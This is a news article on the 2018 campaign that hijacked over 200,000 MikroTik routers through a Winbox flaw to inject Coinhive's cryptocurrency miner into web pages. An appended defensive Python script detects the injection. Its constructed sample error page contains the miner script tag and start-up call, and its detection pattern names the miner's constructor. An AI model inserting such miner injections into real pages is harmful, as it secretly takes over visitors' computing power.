200,000 MikroTik Routers Hacked and Turned Into Crypto-Mining Zombies

Independent malware investigators have discovered a massive cryptojacking campaign that targets MikroTik routers and changes their configuration to inject a copy of the Coinhive in-browser cryptocurrency miner on computers connected to them. More than 210,000 routers from Latvian network hardware provider MikroTik have been affected across the world.

 

The first campaign, noticed by Trustwave researchers, began by targeting networking devices in Brazil, where a hacker or a group of hackers compromised more than 183,700 MikroTik routers.

Troy Mursch, another security researcher, has identified two similar malware campaigns that infected 25,500 and 16,000 MikroTik routers, mainly in Moldova, with malicious cryptocurrency mining code from the infamous Coinhive service.

The attackers inject Coinhive’s JavaScript into every web page that a user visits through a vulnerable router, ultimately forcing every connected computer to unknowingly mine Monero cryptocurrency for the miscreants.

“The hacker created a custom error page with the CoinHive script in it” and “if a router’s user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker,” says Trustwave researcher Simon Kenin.

“The attacker uses a zero-day in the Winbox component of routers. MikroTik patched the zero-day in less than a day, back in April, but this didn’t necessarily mean that router owners applied the required patch,” Kenin said.

It’s a good reminder for users and IT managers who are still running vulnerable MikroTik routers in their environment to patch their devices as soon as possible.

The security flaw can potentially enable an attacker to gain unauthenticated, remote administrative access to any vulnerable MikroTik router.
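
As an added example (not from the original article or from Trustwave), a defender can check pages fetched through a suspect router, such as the custom error page described above, for the injected miner. The `coinhive.com` script host and the `CoinHive.Anonymous` / `CoinHive.User` constructor names are those of Coinhive's public loader; the function name, sample pages and site key are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline miner start-up used by Coinhive's loader, e.g. new CoinHive.Anonymous('<site key>')
MINER_INIT = re.compile(r"CoinHive\.(?:Anonymous|User)\s*\(", re.I)

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def coinhive_findings(html):
    """Return the reasons a page looks like it carries the Coinhive miner."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.srcs:
        # urlparse also handles protocol-relative URLs such as //coinhive.com/...
        host = (urlparse(src).hostname or "").lower()
        if host == "coinhive.com" or host.endswith(".coinhive.com"):
            findings.append("external script from " + host)
    if any(MINER_INIT.search(body) for body in parser.inline):
        findings.append("inline CoinHive miner start-up")
    return findings

# Constructed samples: an error page with the miner injected, and a clean one.
INJECTED_ERROR_PAGE = """<html><body><h1>Error</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); m.start();</script>
</body></html>"""
CLEAN_ERROR_PAGE = "<html><body><h1>404</h1><script src='/js/app.js'></script></body></html>"

if __name__ == "__main__":
    print(coinhive_findings(INJECTED_ERROR_PAGE), coinhive_findings(CLEAN_ERROR_PAGE))
```

Comparing the same request made through the router and over a trusted path (for example a VPN) helps separate router-side injection from a site that embeds the miner itself.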